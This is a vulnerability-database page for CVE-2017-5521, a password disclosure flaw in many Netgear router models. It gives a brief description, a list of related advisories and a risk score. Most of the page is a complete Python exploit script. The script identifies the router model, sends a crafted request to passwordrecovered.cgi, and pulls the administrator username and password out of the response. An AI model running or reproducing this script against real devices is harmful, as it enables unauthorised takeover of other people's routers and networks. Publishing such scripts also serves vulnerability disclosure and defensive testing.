Netgear router password disclosure Vulnerability(CVE-2017-5521)

🗓️ 03 Feb 2017 00:00:00Type

NETGEAR router password disclosure Vulnerability(CVE-2017-5521) affects multiple models leading to password leak through disabled Password Recovery functionalit

Reporter	Title	Published	Views	Family All 28
0day.today	Netgear Routers - Password Disclosure Vulnerabilities	30 Jan 201700:00	–	zdt
ATTACKERKB	CVE-2017-5521	17 Jan 201700:00	–	attackerkb
BDU FSTEC	The vulnerability in the built-in software of NETGEAR routers such as NETGEAR R8500, NETGEAR R8300, NETGEAR R7000, NETGEAR R6400, NETGEAR R7300DST, NETGEAR R7100LG, NETGEAR R6300v2, NETGEAR WNDR3400v3, NETGEAR WNDR3500Lv2, NETGEAR R6250, NETGEAR R6700, NETGEAR R6900, NETGEAR R8000, NETGEAR R7900, NETGEAR WNDR4500v2, NETGEAR R6200v2, NETGEAR WNDR3400v2, NETGEAR D6220, NETGEAR D6400, NETGEAR C6300, NETGEAR R6200, NETGEAR R6300, NETGEAR VENG2610, NETGEAR AC1450, NETGEAR WNDR1000v3, NETGEAR WNDR3700v3, NETGEAR WNDR4000, NETGEAR WNDR4500, NETGEAR D6300, NETGEAR D6300B, NETGEAR DGN2200Bv4, and NETGEAR DGN2200v4, allows a hacker to obtain user password information.	2 Feb 201700:00	–	bdu_fstec
Circl	CVE-2017-5521	30 Jan 201700:00	–	circl
CISA KEV Catalog	NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability	8 Sep 202200:00	–	cisa_kev
CNVD	Multiple NETGEAR routers are vulnerable to administrator password information leaks	3 Feb 201700:00	–	cnvd
Check Point Advisories	NETGEAR Routers Authentication Bypass (CVE-2017-5521)	7 Feb 201700:00	–	checkpoint_advisories
Check Point Advisories	NETGEAR DGN2200 Remote Code Execution (CVE-2017-5521; CVE-2017-6077)	24 May 201800:00	–	checkpoint_advisories
CVE	CVE-2017-5521	17 Jan 201709:22	–	cve
Cvelist	CVE-2017-5521	17 Jan 201709:22	–	cvelist


                                                #!/usr/bin/env python
# coding: utf-8

import sys
import requests

def scrape(text, start_trig, end_trig):
    if text.find(start_trig) != -1:
        return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
    else:
        return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
    r = requests.get(url)
except:
    url = 'https://' + ip + ':' + port + '/'
    r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
    print "Attacking: " + model[13:-1]
else:
    print "not a netgear router"
    sys.exit(0)
#2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt'
try:
    r = requests.post(url, verify=False)
except:
    print "not vulnerable router"
    sys.exit(0)
#profit
if r.text.find('left\">') != -1:
    username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
    username = scrape(username, '>', '\'')
    password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
    password = scrape(password, '>', '\'')
    if username == "i_dont_speak_english":
        username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
        password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
    print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"
    sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&#38;","&")
print "user: " + username
print "pass: " + password

03 Feb 2017 00:00Current

8.2High risk

Vulners AI Score8.2

EPSS0.89294